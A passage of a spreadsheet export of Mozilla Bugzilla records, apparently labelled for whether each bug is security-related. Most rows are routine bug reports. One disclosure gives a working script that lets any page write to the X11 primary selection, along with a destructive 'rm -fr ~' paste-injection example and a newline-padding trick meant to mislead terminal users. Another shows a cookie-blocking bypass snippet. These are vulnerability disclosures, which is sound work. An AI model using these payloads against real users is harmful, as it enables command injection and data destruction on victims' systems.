          <t>Pressing the mouse on a suggested result in the awesomebar (either a suggestion or something from the history) is a strong signal that the page is about to be loaded. We should prepare the network connection without waiting for the click event.</t>
        </is>
      </c>
      <c r="X5115" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5116">
      <c r="A5116" t="n">
        <v>1842658</v>
      </c>
      <c r="B5116" t="inlineStr">
        <is>
          <t>2023-07-10 11:02:41 -0700</t>
        </is>
      </c>
      <c r="C5116" t="inlineStr">
        <is>
          <t>Clean up some manual AddRef/Release implementations</t>
        </is>
      </c>
      <c r="D5116" t="inlineStr">
        <is>
          <t>2024-01-04 01:17:04 -0800</t>
        </is>
      </c>
      <c r="E5116" t="n">
        <v>1</v>
      </c>
      <c r="F5116" t="n">
        <v>1</v>
      </c>
      <c r="G5116" t="n">
        <v>3</v>
      </c>
      <c r="H5116" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5116" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5116" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5116" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5116" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5116" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5116" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5116" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5116" t="inlineStr">
        <is>
          <t>[adv-main116+] [adv-ESR115.1+] [adv-ESR102.14+]</t>
        </is>
      </c>
      <c r="Q5116" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5116" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5116" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T5116" t="n">
        <v>1</v>
      </c>
      <c r="U5116" t="n">
        <v>0</v>
      </c>
      <c r="V5116" t="n">
        <v>18</v>
      </c>
      <c r="W5116" t="inlineStr">
        <is>
          <t>While reading over the refcnt implementations in https://phabricator.services.mozilla.com/D182992, I noticed some of the implementations were manual and in some cases a bit sketchy when they didn't need to be.
This patch is to track cleaning them up, and potentially fixing race issues in atomic refcounts which were not being handled correctly.</t>
        </is>
      </c>
      <c r="X5116" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5117">
      <c r="A5117" t="n">
        <v>1202476</v>
      </c>
      <c r="B5117" t="inlineStr">
        <is>
          <t>2015-09-07 11:40:51 -0700</t>
        </is>
      </c>
      <c r="C5117" t="inlineStr">
        <is>
          <t>Move remaining userguide css, consolidate names</t>
        </is>
      </c>
      <c r="D5117" t="inlineStr">
        <is>
          <t>2015-09-24 13:34:39 -0700</t>
        </is>
      </c>
      <c r="E5117" t="n">
        <v>1</v>
      </c>
      <c r="F5117" t="n">
        <v>1</v>
      </c>
      <c r="G5117" t="n">
        <v>7</v>
      </c>
      <c r="H5117" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5117" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5117" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5117" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5117" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5117" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5117" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5117" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5117" t="inlineStr"/>
      <c r="Q5117" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5117" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5117" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5117" t="n">
        <v>1</v>
      </c>
      <c r="U5117" t="n">
        <v>0</v>
      </c>
      <c r="V5117" t="n">
        <v>5</v>
      </c>
      <c r="W5117" t="inlineStr">
        <is>
          <t>Supplemental to work in bug 1193804, we'd like to finish the move of Help aka. UserGuide and consolidate their names from 'help-' to 'ug-'. This bug represents that change.
While we're at it, we'll 2-space indent the userguide.</t>
        </is>
      </c>
      <c r="X5117" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5118">
      <c r="A5118" t="n">
        <v>1379374</v>
      </c>
      <c r="B5118" t="inlineStr">
        <is>
          <t>2017-07-08 01:57:22 -0700</t>
        </is>
      </c>
      <c r="C5118" t="inlineStr">
        <is>
          <t>Background tabs that haven't been touched will be lost on the first restart after upgrading to 55</t>
        </is>
      </c>
      <c r="D5118" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E5118" t="n">
        <v>1</v>
      </c>
      <c r="F5118" t="n">
        <v>1</v>
      </c>
      <c r="G5118" t="n">
        <v>6</v>
      </c>
      <c r="H5118" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5118" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5118" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5118" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L5118" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5118" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5118" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5118" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5118" t="inlineStr"/>
      <c r="Q5118" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5118" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5118" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5118" t="n">
        <v>1</v>
      </c>
      <c r="U5118" t="n">
        <v>1</v>
      </c>
      <c r="V5118" t="n">
        <v>29</v>
      </c>
      <c r="W5118" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Android 7.0; Mobile; rv:55.0) Gecko/55.0 Firefox/55.0
Build ID: 20170706211248
Steps to reproduce:
Start Firefox Beta.
Actual results:
Only 3 tabs were listed in the current open tabs.
Expected results:
All the previous tabs should have been listed.</t>
        </is>
      </c>
      <c r="X5118" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5119">
      <c r="A5119" t="n">
        <v>1021969</v>
      </c>
      <c r="B5119" t="inlineStr">
        <is>
          <t>2014-06-06 14:28:16 -0700</t>
        </is>
      </c>
      <c r="C5119" t="inlineStr">
        <is>
          <t>mozMediaStatisticsShowing property shouldn't be content-exposed</t>
        </is>
      </c>
      <c r="D5119" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:28 -0700</t>
        </is>
      </c>
      <c r="E5119" t="n">
        <v>1</v>
      </c>
      <c r="F5119" t="n">
        <v>1</v>
      </c>
      <c r="G5119" t="n">
        <v>3</v>
      </c>
      <c r="H5119" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5119" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5119" t="inlineStr">
        <is>
          <t>Video/Audio Controls</t>
        </is>
      </c>
      <c r="K5119" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5119" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5119" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5119" t="inlineStr">
        <is>
          <t>p=2 s=33.1 [adv-main31+]</t>
        </is>
      </c>
      <c r="Q5119" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5119" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5119" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T5119" t="n">
        <v>1</v>
      </c>
      <c r="U5119" t="n">
        <v>0</v>
      </c>
      <c r="V5119" t="n">
        <v>18</v>
      </c>
      <c r="W5119" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1021240 +++
1. Create a video element with controls = true
2. Set the getter for the 'mozMediaStatisticsShowing' property to a function that calls alert
3. Add the video element to the dom tree.
4. Firefox freeze
We'll work around this by avoiding the mozMediaStatisticsShowing property from influencing chrome by sticking it in a webidl property.</t>
        </is>
      </c>
      <c r="X5119" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5120">
      <c r="A5120" t="n">
        <v>1855345</v>
      </c>
      <c r="B5120" t="inlineStr">
        <is>
          <t>2023-09-26 20:24:41 -0700</t>
        </is>
      </c>
      <c r="C5120" t="inlineStr">
        <is>
          <t>On X11, any page can freely write to the primary selection</t>
        </is>
      </c>
      <c r="D5120" t="inlineStr">
        <is>
          <t>2024-11-13 15:57:26 -0800</t>
        </is>
      </c>
      <c r="E5120" t="n">
        <v>1</v>
      </c>
      <c r="F5120" t="n">
        <v>1</v>
      </c>
      <c r="G5120" t="n">
        <v>3</v>
      </c>
      <c r="H5120" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5120" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5120" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K5120" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5120" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5120" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5120" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5120" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5120" t="inlineStr">
        <is>
          <t>[adv-main120+][adv-esr115.5+][reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q5120" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5120" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5120" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T5120" t="n">
        <v>1</v>
      </c>
      <c r="U5120" t="n">
        <v>0</v>
      </c>
      <c r="V5120" t="n">
        <v>47</v>
      </c>
      <c r="W5120" t="inlineStr">
        <is>
          <t>In Firefox running on X11, any script from any page can write to the
primary selection -- which on X11 is the main and most used copy-paste
mechanism.
No "secure context", "transient activation", extra permissions or any other
prerequisites (as required by the much less valuable Clipboard.writeText())
are needed.
This basically means that any visited page can take over the victim's system
the first time she tries to paste something in the terminal.
With prior knowledge of the user's workflow and preferences, devising a
succesful attack is a matter of minutes. Getting something that works
reliably for most Linux/Users users is more complicated but still orders
of magnitude easier than exploiting some memory corruption or similar bug.
=== Example ===
Load the following html snippet inside a Firefox running on top of Xorg
(Xorg, not Wayland, see below why). The protocol (http:, file:, etc) or
whether this runs inside an iframe does not matter.
Then switch to a gnome-terminal or xterm window, and press the middle
button of the mouse or shift-Insert to paste the selection.
Every 500ms you'll get a new text made up of the current time and the
page's url.
------------------x-------------------
&lt;!doctype html&gt;
&lt;title&gt;write to the primary selection&lt;/title&gt;
intentionally left blank
&lt;script&gt;
function setXPrimary(text){
	let d = document.body.appendChild(document.createElement('pre'));
	d.style.fontSize = 0;
	setTimeout(function(){
		d.textContent = text;
		getSelection().selectAllChildren(d);
		d.remove();
	}, 0);
}
setInterval(function(){
	setXPrimary(Date.now() / 1000 + ' ' + document.location)
}, 500);
&lt;/script&gt;
------------------x-------------------
=== NON-mitigating factors ===
1. Wayland only allows the window having the keyboard focus to write to
the primary selection. This complicates things a bit, but not for much; I
think it's possible to detect via timing DOM calls, etc. whether the main
firefox window has acquired the focus and only then write the selection,
even if it's not the tab or iframe the script runs in that has the focus.
2. The "bracketed paste" feature of the terminal and shell (the default
in recent bash) means that you cannot just use "setXPrimary('rm -fr ~\n')"
and be done: it's the user who has to press the Enter for it to run.
However, even naive workarounds like
	setXPrimary("\n" + "echo reboot" + "\n".repeat(100) +
		" ".repeat(30) + "\n".repeat(100))
which will confuse the user with a screen like
	dummy@ohzd:~$ echo first
	first
	dummy@ohzd:~$ true
	dummy@ohzd:~$
	#	&lt;-- cursor here, most users will hit Enter to get a new prompt
will do for it most of the time.</t>
        </is>
      </c>
      <c r="X5120" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5121">
      <c r="A5121" t="n">
        <v>711651</v>
      </c>
      <c r="B5121" t="inlineStr">
        <is>
          <t>2011-12-16 15:50:35 -0800</t>
        </is>
      </c>
      <c r="C5121" t="inlineStr">
        <is>
          <t>Crash after mutating DOM from MozBeforeResize event</t>
        </is>
      </c>
      <c r="D5121" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5121" t="n">
        <v>1</v>
      </c>
      <c r="F5121" t="n">
        <v>1</v>
      </c>
      <c r="G5121" t="n">
        <v>3</v>
      </c>
      <c r="H5121" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5121" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5121" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5121" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5121" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5121" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5121" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5121" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5121" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5121" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5121" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5121" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T5121" t="n">
        <v>1</v>
      </c>
      <c r="U5121" t="n">
        <v>0</v>
      </c>
      <c r="V5121" t="n">
        <v>6</v>
      </c>
      <c r="W5121" t="inlineStr">
        <is>
          <t>Created attachment 582420
testcase (crashes Firefox when loaded)
Crash [@ PresShell::ResizeReflowIgnoreOverride]</t>
        </is>
      </c>
      <c r="X5121" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5122">
      <c r="A5122" t="n">
        <v>1839464</v>
      </c>
      <c r="B5122" t="inlineStr">
        <is>
          <t>2023-06-20 10:18:10 -0700</t>
        </is>
      </c>
      <c r="C5122" t="inlineStr">
        <is>
          <t>"Block all cookies" bypass for localstorage using about:blank iframe, plus  document.cookie weirdness</t>
        </is>
      </c>
      <c r="D5122" t="inlineStr">
        <is>
          <t>2024-05-30 11:11:22 -0700</t>
        </is>
      </c>
      <c r="E5122" t="n">
        <v>1</v>
      </c>
      <c r="F5122" t="n">
        <v>1</v>
      </c>
      <c r="G5122" t="n">
        <v>3</v>
      </c>
      <c r="H5122" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5122" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5122" t="inlineStr">
        <is>
          <t>Privacy: Anti-Tracking</t>
        </is>
      </c>
      <c r="K5122" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5122" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5122" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5122" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5122" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main115+]</t>
        </is>
      </c>
      <c r="Q5122" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5122" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5122" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T5122" t="n">
        <v>1</v>
      </c>
      <c r="U5122" t="n">
        <v>0</v>
      </c>
      <c r="V5122" t="n">
        <v>27</v>
      </c>
      <c r="W5122" t="inlineStr">
        <is>
          <t>Created attachment 9340109
testfiles.zip
[originally submitted via email, but the autoresponder asked to resubmit via bugzilla]
While testing a cookie auto deletion addon, i came across what seem to be a cookie/storage permission bypass.
Steps to reproduce:
0. As usual serve the attached files using a local webserver (like python3 -mhttp.server) and access them on a
   non localhost ip.
1. I have tested this with a fresh firefox nightly (116.0a1 (2023-06-16)(64bit).
2. In the fresh profile set cookie blocking to "custom" and select to block "All cookies".[1]
3. Confirm that normal access to local storage is blocked by using the attached test-noiframe.html
3a: Access to the storage APIs gives a "DOMException: The operation is insecure.", the storage tab in developer tools show no saved data.
4. But Using the attached test2.html give unblocked access to local storage.
Expected Result:
Firefox blocks storage access the same as when using the non iframe version of the test. No data stored.
Actual Result:
The storage apis work and ignore the setting to block the access:
* No exception on usage
* When entering data in the textbox and pressing save, on reloading the page, the page can retrieve the data.
* The saved data is not visible in developer tools, but even after restarting firefox the page can still read back the data.
* The origin with the saved data is shown in "Manage Cookies and Site Data" as having used storage.
I have not tracked done the regression point, but using firefox 100, the blocking works and the api access gives the expected exceptions.
This seems to be a recent regression.
The core part of test2.html is as follows. It seems by just using the contentWindow of a otherwise defaulted iframe,
the blocking of the storage api is evaded.
```HTML
&lt;iframe id="preview" name="preview"&gt;&lt;/iframe&gt;
&lt;script&gt;
let p = document.getElementById('preview');
let currentData = p.contentWindow.localStorage.getItem('blah');
document.getElementById('odata').innerText = currentData;
function setTest() {
    p.contentWindow.localStorage.setItem('blah', document.getElementById('idata').value);
}
&lt;/script&gt;
```
From looking at the profile directory the local storage seems to be attributed to the origin used to access test2.html.
storage.sqlite
INSERT INTO origin VALUES(2,'','192.168.123.123','http://192.168.123.123:4567','L9',9,1686945337316151,1,0);
storage/default/http+++192.168.123.123+4567/ls/data.sqlite
INSERT INTO "database" VALUES('http://192.168.123.123:4567',9,1686944680773745,0,6144);
I've played around a bit if this also allows evading storage isolation, but i did not the storage to leak across.
But this still evades supported data privacy settings.
 [1] The problem also manifests with other global settings and blocking the specific origin.</t>
        </is>
      </c>
      <c r="X5122" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5123">
      <c r="A5123" t="n">
        <v>1846686</v>
      </c>
      <c r="B5123" t="inlineStr">
        <is>
          <t>2023-08-02 00:07:37 -0700</t>
        </is>
      </c>
      <c r="C5123" t="inlineStr">
        <is>
          <t>heap memory leak in memory shared with compromised content process due to wrong GetPreparedMap</t>
        </is>
      </c>
      <c r="D5123" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:16 -0700</t>
        </is>
      </c>
      <c r="E5123" t="n">
        <v>1</v>
      </c>
      <c r="F5123" t="n">
        <v>1</v>
      </c>
      <c r="G5123" t="n">
        <v>3</v>
      </c>
      <c r="H5123" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5123" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5123" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5123" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5123" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5123" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5123" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5123" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5123" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main118+]</t>
        </is>
      </c>
      <c r="Q5123" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5123" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5123" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T5123" t="n">
        <v>1</v>
      </c>
      <c r="U5123" t="n">
        <v>0</v>
      </c>
      <c r="V5123" t="n">
        <v>25</v>
      </c>
      <c r="W5123" t="inlineStr">
        <is>
          <t>Created attachment 9346865
ASAN.txt
While graphics rendering, |SetPreparedMap()|[1], |GetPreparedMap()|[2] are used to cache |dataSurface|[3]. In |SetPreparedMap()|, it assign the |dataSurface| to |mPreparedMap| and set corresponding |mMappedSurface|. In |GetPreparedMap()|, it checks |aSurface| has changed by "MOZ_RELEASE_ASSERT(mMappedSurface == aSurface". However, |aSurface| can be replaced between |SetPreparedMap()| and |GetPreparedMap()| with the same |mMappedSurface|. The non-corresponding |aSurface| is used with |GetPreparedMap()|[4]. It leads to heap memory leak and the memory is sent to the compromised content process with shared memory[5].
It is verified that heap memory leak leads to sandbox escape many times, especially with ipc port leaked. There is also |Port| in firefox[6] and I think firefox is not safe from this.
[1]: https://searchfox.org/mozilla-central/source/gfx/layers/ipc/CanvasTranslator.cpp#540
[2]: https://searchfox.org/mozilla-central/source/gfx/layers/ipc/CanvasTranslator.cpp#547
[3]: https://searchfox.org/mozilla-central/source/gfx/layers/RecordedCanvasEventImpl.h#309
[4]: https://searchfox.org/mozilla-central/source/gfx/layers/RecordedCanvasEventImpl.h#359
[5]: https://searchfox.org/mozilla-central/source/gfx/layers/RecordedCanvasEventImpl.h#364
[6]: https://searchfox.org/mozilla-central/source/ipc/chromium/src/mojo/core/ports/port.h#102 
REPRODUCE
Operating System: All
1.apply *patch.diff
2.visit index.html
*: Patch to emulate a compromised content process.
Crash State: see asan file</t>
        </is>
      </c>
      <c r="X5123" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5124">
      <c r="A5124" t="n">
        <v>1111243</v>
      </c>
      <c r="B5124" t="inlineStr">
        <is>
          <t>2014-12-13 10:46:29 -0800</t>
        </is>
      </c>
      <c r="C5124" t="inlineStr">
        <is>
          <t>Crash with structured-cloning and proxy wrapped Map/Sets</t>
        </is>
      </c>
      <c r="D5124" t="inlineStr">
        <is>
          <t>2018-02-23 02:49:05 -0800</t>
        </is>
      </c>
      <c r="E5124" t="n">
        <v>1</v>
      </c>
      <c r="F5124" t="n">
        <v>1</v>
      </c>
      <c r="G5124" t="n">
        <v>3</v>
      </c>
      <c r="H5124" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5124" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5124" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5124" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5124" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5124" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5124" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5124" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5124" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q5124" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5124" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5124" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T5124" t="n">
        <v>1</v>
      </c>
      <c r="U5124" t="n">
        <v>0</v>
      </c>
      <c r="V5124" t="n">
        <v>41</v>
      </c>
      <c r="W5124" t="inlineStr">
        <is>
          <t>Created attachment 8536057
POC
If you do: proxy = Proxy(new Map(), {}), then for proxy ObjectClassIs(obj, ESClass_Map) is going to return true, but CheckedUnwrap(proxy) is not going to unwrap anything.
Crash in JSStructuredCloneWriter::traverseMap -&gt; MapObject::getKeysAndValuesInterleaved.</t>
        </is>
      </c>
      <c r="X5124" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5125">
      <c r="A5125" t="n">
        <v>1370518</v>
      </c>
      <c r="B5125" t="inlineStr">
        <is>
          <t>2017-06-06 06:05:37 -0700</t>
        </is>
      </c>
      <c r="C5125" t="inlineStr">
        <is>
          <t>The search suggestions hint is displayed on focusing the Awesome bar only the first time</t>
        </is>
      </c>
      <c r="D5125" t="inlineStr">
        <is>
          <t>2017-06-13 20:53:32 -0700</t>
        </is>
      </c>
      <c r="E5125" t="n">
        <v>1</v>
      </c>
      <c r="F5125" t="n">
        <v>1</v>
      </c>
      <c r="G5125" t="n">
        <v>2</v>
      </c>
      <c r="H5125" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5125" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5125" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5125" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L5125" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5125" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5125" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5125" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5125" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q5125" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5125" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5125" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5125" t="n">
        <v>1</v>
      </c>
      <c r="U5125" t="n">
        <v>0</v>
      </c>
      <c r="V5125" t="n">
        <v>14</v>
      </c>
      <c r="W5125" t="inlineStr">
        <is>
          <t>[Affected versions]:
- Nightly 55.0a1
[Affected platforms]:
- All
[Steps to reproduce]:
1. Open Firefox
2. Ctrl+L to focus the Awesome Bar
3. Click on the content to make the Awesome Bar lose focus
4. Ctrl+T to open a new tab
[Expected result]:
- In steps 2 and 4, the search suggestions hint should be displayed
[Actual result]:
- In step 4, the search suggestions hint is not displayed (even if the Awesome bar is focused)
[Regression range]:
- https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=94906c37940c6b1c371dc7c22ed2098face96d8b&amp;tochange=7fb3d9dfa8e684d5258a3d96b7176a1fa95fe205</t>
        </is>
      </c>
      <c r="X5125" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5126">
      <c r="A5126" t="n">
        <v>355569</v>
      </c>
      <c r="B5126" t="inlineStr">
        <is>
          <t>2006-10-05 13:02:08 -0700</t>
        </is>
      </c>
      <c r="C5126" t="inlineStr">
        <is>
          <t>XML.prototype.hasOwnProperty is exploitable (CVE-2006-5747)</t>
        </is>
      </c>
      <c r="D5126" t="inlineStr">
        <is>
          <t>2008-10-17 14:28:53 -0700</t>
        </is>
      </c>
      <c r="E5126" t="n">
        <v>1</v>
      </c>
      <c r="F5126" t="n">
        <v>1</v>
      </c>
      <c r="G5126" t="n">
        <v>3</v>
      </c>
      <c r="H5126" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5126" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5126" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5126" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5126" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5126" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5126" t="inlineStr">
        <is>
          <t>[sg:critical] fixed by 355478</t>
        </is>
      </c>
      <c r="Q5126" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5126" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5126" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5126" t="n">
        <v>1</v>
      </c>
      <c r="U5126" t="n">
        <v>0</v>
      </c>
      <c r="V5126" t="n">
        <v>13</v>
      </c>
      <c r="W5126" t="inlineStr">
        <is>
          <t>I had a proof of concept exploit for this vulnerability a month ago,
but it was lost due to HDD crash. bug 355478 have reminded me of it.
TB22649748Q</t>
        </is>
      </c>
      <c r="X5126" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5127">
      <c r="A5127" t="n">
        <v>1432624</v>
      </c>
      <c r="B5127" t="inlineStr">
        <is>
          <t>2018-01-23 13:38:44 -0800</t>
